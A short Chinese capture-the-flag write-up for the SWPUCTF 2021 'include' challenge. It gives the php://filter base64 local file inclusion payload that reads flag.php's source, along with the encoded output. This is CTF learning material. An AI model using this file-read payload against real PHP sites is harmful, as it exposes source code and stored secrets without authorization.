技术栈

[SWPUCTF 2021 新生赛]include

桑榆百川2024-08-11 21:24

传入一个file试试,尝试/?file=3

提示flag 在flag.php中,但是无法直接读出flag.php - 原因是由于flag.php中不具有echo相对应的输出语句,应该是仅具有$flag变量的定义。因此,采用php伪协议进行输出

?file=php://filter/convert.base64-encode/resource=flag.php

得到PD9waHANCiRmbGFnPSdOU1NDVEZ7Njk4MGY2OTctNzE0OC00M2FlLWFjZmUtNjk2OWZjMzdkNTgwfSc7

进行base64解密即可

上一篇:Java使用MQTT协议
下一篇:【lvs】
相关推荐
一名优秀的码农
7 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
努力的lpp
7 天前
SQLMap CTF 常用命令全集
数据库·web安全·网络安全·sql注入
努力的lpp
7 天前
SQL 报错注入
数据库·sql·web安全·网络安全·sql注入
岛屿旅人
7 天前
2025年中东地区网络安全态势综述
网络·安全·web安全·网络安全
努力的lpp
7 天前
【ctf常用备用文件名字典】
web安全·网络安全·ctf
Mikowoo007
7 天前
渗透测试_漏洞利用
网络安全
啥都想学点
7 天前
pikachu靶场——Cross-Site Scripting-1(Kali系统)
网络安全
F1FJJ
7 天前
基于网络隐身的内网穿透
网络协议·网络安全·go
苏天夏
7 天前
Passport 插件:Typecho 密码安全的技术守护者
安全·网络安全·php
Lust Dusk
7 天前
CTFHUB靶场 HTTP协议——302跳转
web安全·网络安全
热门推荐
01GitHub 镜像站点02OpenClaw 使用和管理 MCP 完全指南03OpenClaw + 飞书(Feishu)环境搭建指南04Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services05OpenClaw优化飞书API 额度已耗尽问题06Window 10部署openclaw报错node.exe : npm error code 12807小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)08Clawdbot部署教程:解决‘gateway token missing’授权问题的完整步骤09本地部署 OpenClaw + DeepSeek-R1 完全指南10网站改了域名,如何查找?